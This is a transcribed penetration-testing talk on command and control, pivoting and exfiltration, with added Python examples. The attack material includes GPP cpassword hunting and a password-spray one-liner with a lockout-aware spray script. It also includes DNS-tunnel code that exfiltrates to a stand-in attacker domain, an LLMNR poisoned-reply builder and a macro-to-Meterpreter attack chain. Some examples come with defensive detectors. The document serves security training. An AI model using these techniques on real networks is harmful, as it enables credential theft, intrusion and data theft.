Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show True Risk

Post on 16-Apr-2017


Beau Bullock

Beyond the Pentest

What does a standard internal network pentest already cover?

Port scans

Vulnerability scanning

Manual validation

Provide recommendations

What Is Wrong With This

Attackers don't run vulnerability scans; too noisy

Misses some very critical weaknesses that a scanner does not report

Doesn't account for a domain system that is already compromised (the assumed-breach case)

whoami

Beau Bullock

Pentester at Black Hills Information Security

Host of Hack Naked TV

Previously an enterprise defender

OSCP, GXPN, GPEN, GCIH, GCFA, OSWP and GSEC

What Are We Missing

Three major things

Command and Control

Internal Pivoting

Data Exfiltration

How Do We Test These

Start with the basics

Standard domain user account

Lowest level of access typically provisioned

Standard system build

Anyone on leave? Steal their system

Standard network access

Command and Control

Command and Control

Three focus areas

Payload delivery

Email, web, etc.

Client-based protections

AV, application whitelisting, HIDS, etc.

Network-based protections

Egress filtering, IDS/IPS, inline payload detonation

C2: Payload Delivery

What can be emailed to your employees?

Executable

PDF

Word DOC or XLS w/ macro

Batch file

Encrypted ZIP

Extensionless files?

C2: Payload Delivery

Protip:

Many webmail services scan attachments for malware

Some don't allow EXEs at all

Yahoo's MTA does not scan and allows EXEs

Use a third-party mail client to send through Yahoo

C2: Payload Delivery

What can be downloaded?

How about browser or Java or Adobe exploits?

Are users allowed to insert USB drives?

C2: Client-Based Protections

Did anything detect the payload after entry?

Anti-Virus

Application whitelisting

SIEM alerts

C2: Client-Based Protections

Payload types

Non-encoded EXE

Encoded EXE

ShellCode injection

Word Doc w/ macro

Software exploit

Physical access (rubber ducky)

C2: Client-Based Protections

Bypassing Client-based protections

Veil-Evasion

Framework for creating custom malware

PowerSploit

Invoke-Shellcode injects shellcode directly into memory, so no executable touches disk

Obfuscation

C2: Network-Based Protections

Was the C2 channel detected?

Firewall block

IDS/IPS detection

Inline Detonation

C2: Network-Based Protections

What does an outbound port scan reveal?

open.zorinaq.com (a host that accepts connections on every TCP port; whatever the scan reports open is what egress filtering lets out)

Weak egress filtering gives C2 more room to work

DLP might miss data that is not sent over standard ports

C2: Some Typical C2 Channels

Standard TCP

HTTP/HTTPS

DNS

ICMP

C2: C2 Through A Web Proxy

Meterpreter reverse_https

Honors the proxy settings configured on the system

PowerShell Empire!!!

Same as above, but in PowerShell

Either one appears as ordinary web traffic through your web proxy

C2: C2 Over Social Media

Can your users get to any social media sites?

Twittor - Uses Twitter direct messages as a C2 channel

GCAT - Uses Gmail as a C2 channel

Sneaky-Creeper - Uses Twitter, Tumblr, and Soundcloud as a C2 channel

C2: C2 over DNS

dnscat2

Tunnels traffic through DNS requests and responses

The attacker runs the authoritative name server for a domain (delegated by an NS record); the victim's own recursive DNS server forwards the client's queries there

C2 works even with EVERY port blocked outbound from the client, as long as the client can resolve names through the internal DNS server

https://github.com/iagox86/dnscat2
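To make the mechanism concrete, here is an added Python example; it is not dnscat2's code (dnscat2 has its own packet format) but follows the same idea: hex-encode the data into subdomain labels under a zone the attacker is authoritative for, and let the victim's recursive resolver carry the queries. It also shows the heuristic a defender can run over DNS query logs to spot such names. The domain c2.example.net, the session id, and the command output are constructed for the demo.

```python
"""Added example (not dnscat2's code): data in DNS query names, and the
defender-side heuristic that flags them.  Domain, session id and the
command output are constructed for the demo."""
import binascii
import math
from collections import Counter

MAX_NAME = 253         # DNS limit on a full name
LABEL_LEN = 60         # hex chars per label (the limit is 63 octets)
LABELS_PER_QUERY = 3   # 180 hex chars = 90 bytes of payload per query

C2_DOMAIN = "c2.example.net"   # assumed attacker-controlled zone
SAMPLE_OUTPUT = (b"CORP\\alice\r\n"                        # constructed whoami-style output
                 b"Group: CORP\\Domain Users\r\n"
                 b"Logon server: \\\\DC01\r\n"
                 b"Home: \\\\fs01\\users\\alice\r\n"
                 b"Shares: \\\\fs01\\finance \\\\fs01\\hr\r\n")


def encode_message(data, session, domain=C2_DOMAIN):
    """Client side: spread hex(data) over names shaped
    <seq>.<hex label>[.<hex label>...].<session>.<domain>."""
    hexdata = binascii.hexlify(data).decode("ascii")
    per_query = LABEL_LEN * LABELS_PER_QUERY
    chunks = [hexdata[i:i + per_query] for i in range(0, len(hexdata), per_query)] or [""]
    names = []
    for seq, chunk in enumerate(chunks):
        labels = [chunk[i:i + LABEL_LEN] for i in range(0, len(chunk), LABEL_LEN)]
        name = ".".join([str(seq)] + labels + [session, domain])
        if len(name) > MAX_NAME:
            raise ValueError("name exceeds %d octets; use a shorter domain" % MAX_NAME)
        names.append(name)
    return names


def decode_queries(names, domain=C2_DOMAIN):
    """Server side (the authoritative server sees every query the victim's
    resolver forwards): group by session, order by seq, unhex.  Queries
    may arrive out of order; names outside our zone are ignored."""
    sessions = {}
    for name in names:
        if not name.endswith("." + domain):
            continue
        parts = name[:-(len(domain) + 1)].split(".")
        seq, session = int(parts[0]), parts[-1]
        sessions.setdefault(session, {})[seq] = "".join(parts[1:-1])
    return {s: binascii.unhexlify("".join(chunks[i] for i in sorted(chunks)))
            for s, chunks in sessions.items()}


def shannon_entropy(text):
    """Bits per character: hex-encoded data sits near 4.0, real words far lower."""
    if not text:
        return 0.0
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())


def looks_like_tunnel(name, min_len=100, min_hex_fraction=0.9, min_entropy=3.5):
    """Defender heuristic over query logs: a long name whose labels below the
    registered domain are almost all hex digits or are high-entropy.
    Assumes a two-label registered domain; public-suffix handling is omitted.
    Short trailing fragments slip under the length check, so correlate on
    the domain and query volume as well."""
    body = "".join(name.lower().split(".")[:-2])
    if len(name) < min_len or not body:
        return False
    hex_fraction = sum(c in "0123456789abcdef" for c in body) / len(body)
    return hex_fraction >= min_hex_fraction or shannon_entropy(body) >= min_entropy


if __name__ == "__main__":
    queries = encode_message(SAMPLE_OUTPUT, "a1b2")
    for q in queries:
        print(len(q), q[:60] + "...", "tunnel" if looks_like_tunnel(q) else "benign")
    print(decode_queries(queries))
```

The 120-byte sample becomes two queries; the second carries only 60 hex characters and stays under the length threshold, which is why the detector is a heuristic to combine with volume and domain reputation, not a rule on its own.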

C2: C2 over ICMP

Invoke-PowerShellICMP

Tunnels traffic through ICMP echo requests and echo replies

ICMP is commonly allowed through firewalls

https://github.com/samratashok/nishang/tree/master/Shells

Internal Pivoting

Use built-in tools as a low level user to compromise a network

No vuln scans needed

Less noise

Escalate privileges; locate sensitive data

Pivot: GPP Passwords

May 13, 2014: MS14-025

Passwords that Group Policy Preferences set for accounts are trivially decrypted: the AES key is published in Microsoft's own documentation of the cpassword attribute

...by ANY authenticated user on the domain

Located in Groups.xml (and other Preference XML files) on SYSVOL

MS14-025 only stops new passwords from being set this way; existing cpassword values stay on SYSVOL until someone removes them

https://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspx

http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx

https://dirteam.com/sander/2014/05/23/security-thoughts-passwords-in-group-policy-preferences-cve-2014-1812/

Pivot: GPP Passwords

First thing I check for on an internal assessment

Almost always find an admin password here

Find it with:

PowerSploit - Get-GPPPassword

Metasploit GPP Module

Or, from a domain-joined command prompt:

C:\>findstr /S cpassword %logonserver%\sysvol\*.xml
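An added Python example of what the tools above do in their first step: walk a SYSVOL-style tree, pull every Group Policy Preference item that carries a cpassword attribute, and check that the value is valid AES ciphertext. This is not PowerSploit's Get-GPPPassword or the Metasploit module, and it stops short of decryption (the AES-256 key is the one in the MSDN cpassword documentation linked above). The SYSVOL tree written by build_sample_sysvol(), the GPO GUIDs and the account names are constructed for the demo.

```python
"""Added example (not Get-GPPPassword): locate cpassword values on SYSVOL.
The SYSVOL tree built below is constructed for the demo."""
import base64
import os
import tempfile
import xml.etree.ElementTree as ET

# Preference files that can carry a cpassword attribute (matched case-insensitively).
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "drives.xml", "printers.xml"}
# Attribute the different preference types use for the account name.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def normalize_cpassword(cpassword):
    """cpassword is base64 with the '=' padding stripped.  Restore it and
    return the raw AES-CBC ciphertext, which must be whole 16-byte blocks."""
    raw = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    if not raw or len(raw) % 16:
        raise ValueError("cpassword decodes to %d bytes, not whole AES blocks" % len(raw))
    return raw


def find_cpasswords(sysvol_root):
    """One record per cpassword found under sysvol_root."""
    hits = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for fname in files:
            if fname.lower() not in GPP_FILES:
                continue
            path = os.path.join(dirpath, fname)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:
                continue
            # ElementTree has no parent pointers; the item name and change
            # time live on the element that wraps <Properties>.
            parents = {child: parent for parent in root.iter() for child in parent}
            for elem in root.iter():
                cpassword = elem.get("cpassword")
                if not cpassword:
                    continue
                item = parents.get(elem, elem)
                hits.append({
                    "file": path,
                    "item": item.get("name", item.tag),
                    "account": next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), ""),
                    "changed": item.get("changed", ""),
                    "cpassword": cpassword,
                    "ciphertext_len": len(normalize_cpassword(cpassword)),
                })
    return hits


# Constructed stand-in for a real cpassword: 32 bytes (two AES blocks) as
# unpadded base64, the way GPP writes it.  A real value is AES-256-CBC output.
SAMPLE_CPASSWORD = base64.b64encode(bytes(range(32))).decode("ascii").rstrip("=")

GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin" changed="2014-05-13 09:30:00"
        uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="%s" changeLogon="0" noChange="1"
                neverExpires="1" acctDisabled="0" userName="LocalAdmin"/>
  </User>
</Groups>
""" % SAMPLE_CPASSWORD

TASKS_XML = """<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks>
  <Task name="NightlyBackup" changed="2014-05-13 09:31:00"
        uid="{00000000-0000-0000-0000-000000000002}">
    <Properties action="C" name="NightlyBackup" appName="backup.exe"
                runAs="CORP\\svc_backup" cpassword="%s"/>
  </Task>
</ScheduledTasks>
""" % SAMPLE_CPASSWORD

# A Groups.xml that only manages membership and carries no password.
MEMBERS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <Group name="Administrators (built-in)" changed="2014-05-13 09:32:00">
    <Properties action="U" groupName="Administrators (built-in)">
      <Members><Member name="CORP\\Helpdesk" action="ADD"/></Members>
    </Properties>
  </Group>
</Groups>
"""


def build_sample_sysvol():
    """Write the constructed files in the layout SYSVOL uses; return the root."""
    root = tempfile.mkdtemp(prefix="sysvol-")
    policies = os.path.join(root, "corp.local", "Policies")
    for guid, sub, fname, body in (
            ("{11111111-1111-1111-1111-111111111111}", "Machine/Preferences/Groups", "Groups.xml", GROUPS_XML),
            ("{22222222-2222-2222-2222-222222222222}", "Machine/Preferences/ScheduledTasks", "ScheduledTasks.xml", TASKS_XML),
            ("{33333333-3333-3333-3333-333333333333}", "User/Preferences/Groups", "Groups.xml", MEMBERS_XML)):
        d = os.path.join(policies, guid, *sub.split("/"))
        os.makedirs(d)
        with open(os.path.join(d, fname), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for hit in find_cpasswords(build_sample_sysvol()):
        print("%(account)s in %(item)s (%(changed)s): %(cpassword)s" % hit)
        print("   ", hit["file"])
```

Point it at \\DOMAIN\SYSVOL instead of the sample tree to run it for real; the "changed" timestamp tells you how long the password has been sitting there, and a file that only manages group membership (the third sample) correctly produces no hit.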

Pivot: Privilege Escalation

Local privilege escalation

Are we already a local admin?

PowerUp

Invoke-AllChecks looks for potential privilege escalation vectors

http://www.verisgroup.com/2014/06/17/powerup-usage/

Pivot: Misconfigured Systems

Occasionally, admins get lazy… and do things like add “Domain Users” group to the “Local Administrators” group

Pivot: Misconfigured Systems

This means EVERY domain user is now an administrator of that system

Veil-PowerView Find-LocalAdminAccess

Veil-PowerView Invoke-ShareFinder

http://www.harmj0y.net/blog/penetesting/finding-local-admin-with-the-veil-framework/

Pivot: Password Spraying

Domain locks out accounts after a certain number of failed logins within the lockout observation window

Can't brute force a single account

Solution:

Try a number of passwords smaller than the lockout threshold against EVERY account in the domain, then wait out the observation window before the next batch

Pivot: Password Spraying

Example lockout policy: threshold of five (read the real values with net accounts /domain)

Let's try one password across every account

What passwords do we try?

Password123

Companyname123

SeasonYear

From a command prompt on a domain-joined host, with one user per line in users.txt and the password(s) in pass.txt:

C:\>@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DOMAINCONTROLLER\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\DOMAINCONTROLLER\IPC$ > NUL
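The one-liner above does not pace itself against the lockout policy; that is left to the operator. The following added Python example (not the author's code) shows the pacing logic: guesses per account stay below the threshold, the spray is password-major, and the observation window is waited out between rounds. It runs against a constructed in-memory stand-in for a domain controller that applies Active Directory's lockout rules, so it executes offline; the user list, credentials, and the 5-attempt / 30-minute policy are assumptions. For a real domain, swap in an authenticate function that does the net use or LDAP bind and read the policy first with net accounts /domain.

```python
"""Added example (not the author's code): lockout-aware password spraying
against a constructed fake domain.  Users, credentials and the lockout
policy below are assumptions."""


def make_clock(start=0.0):
    """Simulated time so the wait between rounds is testable without sleeping."""
    state = {"now": start}

    def now():
        return state["now"]

    def advance(seconds):
        state["now"] += seconds

    return now, advance


class FakeDomain:
    """Constructed stand-in applying Active Directory's lockout rules: a bad
    password raises badPwdCount, the count resets once reset_window seconds
    have passed since the last bad password, and the account locks at
    threshold.  A good password clears the count."""

    def __init__(self, creds, threshold, reset_window, clock):
        self.creds, self.threshold, self.reset_window, self.clock = creds, threshold, reset_window, clock
        self.bad = {}          # user -> (badPwdCount, time of last bad password)
        self.locked = set()

    def authenticate(self, user, password):
        now = self.clock()
        if user in self.locked:
            return False
        count, last = self.bad.get(user, (0, now))
        if now - last > self.reset_window:
            count = 0
        if self.creds.get(user) == password:
            self.bad.pop(user, None)
            return True
        count += 1
        self.bad[user] = (count, now)
        if count >= self.threshold:
            self.locked.add(user)
        return False


def plan_rounds(passwords, threshold, safety_margin=1):
    """Guesses per account per observation window stay below the threshold;
    the margin leaves room for the user's own typos."""
    per_round = threshold - 1 - safety_margin
    if per_round < 1:
        raise ValueError("threshold %d leaves no room to spray safely" % threshold)
    return [passwords[i:i + per_round] for i in range(0, len(passwords), per_round)]


def spray(users, passwords, authenticate, threshold, reset_window, sleep, safety_margin=1):
    """Password-major spray: one guess across every account, then the next.
    Between rounds, wait out the observation window so badPwdCount resets.
    Accounts with a hit are dropped from later rounds."""
    hits, remaining = {}, list(users)
    rounds = plan_rounds(passwords, threshold, safety_margin)
    for i, chunk in enumerate(rounds):
        for password in chunk:
            for user in list(remaining):
                if authenticate(user, password):
                    hits[user] = password
                    remaining.remove(user)
        if remaining and i < len(rounds) - 1:
            sleep(reset_window + 60)   # the window plus a minute of slack
    return hits


USERS = ["alice", "bob", "carol", "dave"]                      # constructed
CREDS = {"bob": "Spring2016", "dave": "Password123"}            # constructed
PASSWORDS = ["Spring2016", "Password123", "Companyname123", "Summer2016", "Welcome1"]


def demo(paced=True):
    """Spray the fake domain; paced=False skips the wait so the lockouts a
    naive spray causes show up in the result.  Returns (hits, locked users)."""
    clock, advance = make_clock()
    domain = FakeDomain(CREDS, threshold=5, reset_window=30 * 60, clock=clock)
    sleep = advance if paced else (lambda seconds: None)
    hits = spray(USERS, PASSWORDS, domain.authenticate, 5, 30 * 60, sleep)
    return hits, sorted(domain.locked)


if __name__ == "__main__":
    print("paced:", demo(paced=True))
    print("naive:", demo(paced=False))
```

With five passwords and a threshold of five, the paced run needs two rounds and locks nobody; the same list sprayed without the pause puts five bad passwords on every account that had no hit, and those accounts lock, which is exactly the noise that gets a spray noticed.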

Pivot: LLMNR & NBTNS Poison

LLMNR = Link-Local Multicast Name Resolution

NBT-NS = NetBIOS over TCP/IP Name Service

Both are fallback name resolution mechanisms: when a DNS lookup fails, the host asks the local network segment and trusts whoever answers, which is what poisoning exploits

Pivot: LLMNR & NBTNS Poison

http://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning

Pivot: LLMNR & NBTNS Poison

SpiderLabs Responder

Inveigh PowerShell Script

The result is that we capture NetNTLMv1/v2 challenge/response hashes for the accounts that tried to connect

Crack the hashes offline (a challenge/response is not reusable for pass-the-hash; the recovered cleartext password is what gives the pivot)

https://www.trustwave.com/Resources/SpiderLabs-Blog/Introducing-Responder-1-0/
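An added Python example of the exchange itself, not Responder's or Inveigh's code: LLMNR reuses the DNS message format over UDP 5355 to 224.0.0.252, a client multicasts a question for a name DNS could not resolve, and a poisoner answers with its own address. The same functions give the defender the honeypot check that catches a poisoner on a segment: query a name that does not exist and treat any answer as hostile. Host names and addresses are constructed.

```python
"""Added example (not Responder's code): LLMNR query, a poisoner's reply,
and the honeypot check.  Names and addresses are constructed."""
import random
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355
TYPE_A, CLASS_IN = 1, 1


def encode_name(name):
    """DNS wire form: length-prefixed labels ending in a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("utf-8")
        if not 0 < len(raw) < 64:
            raise ValueError("label length must be 1..63: %r" % label)
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def decode_name(data, offset):
    labels = []
    while True:
        length = data[offset]
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        if length & 0xC0:
            raise ValueError("compression pointers are not used in LLMNR names")
        labels.append(data[offset:offset + length].decode("utf-8"))
        offset += length


def build_query(name, txid=None):
    """Client side: ID, flags 0 (query), one A-record question."""
    txid = random.randrange(1 << 16) if txid is None else txid
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", TYPE_A, CLASS_IN)


def build_poisoned_response(query, answer_ip, ttl=30):
    """Poisoner side: echo the ID and question, answer with our own address."""
    txid = struct.unpack("!H", query[:2])[0]
    name, end = decode_name(query, 12)
    question = query[12:end + 4]
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)   # QR=1, one answer
    rdata = socket.inet_aton(answer_ip)
    answer = encode_name(name) + struct.pack("!HHIH", TYPE_A, CLASS_IN, ttl, 4) + rdata
    return header + question + answer


def parse_response(data):
    """Return (txid, [question names], [(name, ipv4)]) from a response."""
    txid, flags, qdcount, ancount = struct.unpack("!HHHH", data[:8])
    if not flags & 0x8000:
        raise ValueError("QR bit clear: this is a query, not a response")
    offset, questions, answers = 12, [], []
    for _ in range(qdcount):
        name, offset = decode_name(data, offset)
        questions.append(name)
        offset += 4                                  # skip QTYPE and QCLASS
    for _ in range(ancount):
        name, offset = decode_name(data, offset)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        rdata, offset = data[offset:offset + rdlen], offset + rdlen
        if rtype == TYPE_A and rclass == CLASS_IN and rdlen == 4:
            answers.append((name, socket.inet_ntoa(rdata)))
    return txid, questions, answers


def is_poisoner_response(query, response):
    """The query was for a name known not to exist, so a matching answer can
    only come from a poisoner.  Both the ID and the name must match."""
    qtxid = struct.unpack("!H", query[:2])[0]
    qname, _ = decode_name(query, 12)
    txid, _questions, answers = parse_response(response)
    return txid == qtxid and any(n.lower() == qname.lower() for n, _ in answers)


def honeypot_name(rng=random):
    """A name nobody legitimately owns; only a poisoner will answer it."""
    return "hp-" + "".join(rng.choice("abcdefghjkmnpqrstuvwxyz23456789") for _ in range(10))


if __name__ == "__main__":
    # Live probe: multicast the honeypot query and report whoever answers.
    query = build_query(honeypot_name())
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(2)
    sock.sendto(query, (LLMNR_GROUP, LLMNR_PORT))
    try:
        while True:
            data, (src, _port) = sock.recvfrom(512)
            if is_poisoner_response(query, data):
                print("poisoner at", src, "answered", parse_response(data)[2])
    except socket.timeout:
        print("no LLMNR responses (no poisoner, or LLMNR is disabled)")
```

Run the live probe from a workstation on the segment you want to check; a quiet segment times out, and a Responder instance answers the honeypot name within a second. The fix on the defensive side is to disable LLMNR and NBT-NS through Group Policy so clients never ask the segment in the first place.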

Sensitive Data Hunt

Sensitive Data: Info Disclosure on Shares

Sensitive files on shares?

Find them with PowerView

ShareFinder then FileFinder

FileFinder will find files with the following strings in their names:

‘*pass*’, ‘*sensitive*’, ‘*admin*’, ‘*secret*’, ‘*login*’, ‘*unattend*.xml’, ‘*.vmdk’, ‘*creds*’, or ‘*credential*’ 

Sensitive Data: Locate RDP Jump Hosts

Where are users RDP’ing to?

Can provide insight into where critical systems are

Get-NetComputers | Get-NetRDPSessions | Export-Csv -NoTypeInformation rdpsessions.csv

http://www.harmj0y.net/blog/powershell/powerquinsta/

Sensitive Data: Virtualization Hypervisors

Data Exfiltration

Data Exfiltration

What are organizations concerned about leaving their networks?

PCI data

Patient health information

Personally Identifying Information

Intellectual property

Data Exfiltration

How can attackers get data out of your network? 

Email

Web Access

USB Drive

Photo

Data Exfil: Email

For email, is DLP enforced on each of the following?

Cleartext in the email body

Encoded (e.g. Base64) data in the email body

Attachments

Text inside images (does the DLP do optical character recognition?)

Data Exfil: Web

Is all web traffic subject to DLP inspection?

Same types of tests as for email, but sent over both standard and non-standard web ports

Data Exfil: USB Drives

Are files allowed to be copied to a USB drive?

Encryption

DLP

Blocked completely

Putting It All Together

Attack Scenario

Target Organization Setup

Firewall only allows outbound traffic through web proxy

AV up to date on clients

Email gateway allows Doc files

Local Administrator account is widespread with same credentials

Attack Scenario

Phishing email is crafted with Word doc attachment

Word doc is weaponized with a Macro

Email is sent to target employee

Attack Scenario

Employee opens email

Downloads attached .doc

Enables content

Macro runs PowerSploit PowerShell script to inject Meterpreter Reverse_https into memory

Meterpreter C2 channel is established

Attack Scenario

Password spray from the command line

A seasonal password such as Spring2016 is a good first guess

Run Find-LocalAdminAccess to find where the compromised users are local admin

Pivot using psexec

Attack Scenario

Attacker dumps local user hashes (including the local Administrator)

The local Administrator credential is not randomized across systems

Using PowerView Invoke-UserHunter the attacker finds where Domain Admins are logged on

Attack Scenario

Attacker pivots to a DA workstation

Runs Mimikatz to dump creds from memory

Locates sensitive data with PowerView Invoke-ShareFinder

Exfils data

Summary

What are the benefits of this style of testing?

Real test of detection and incident response

Shows how an attacker can go from low access to owning the environment

Shows true risk to the organization

Thank You!

beau@blackhillsinfosec.com

beau@dafthack.com

@dafthack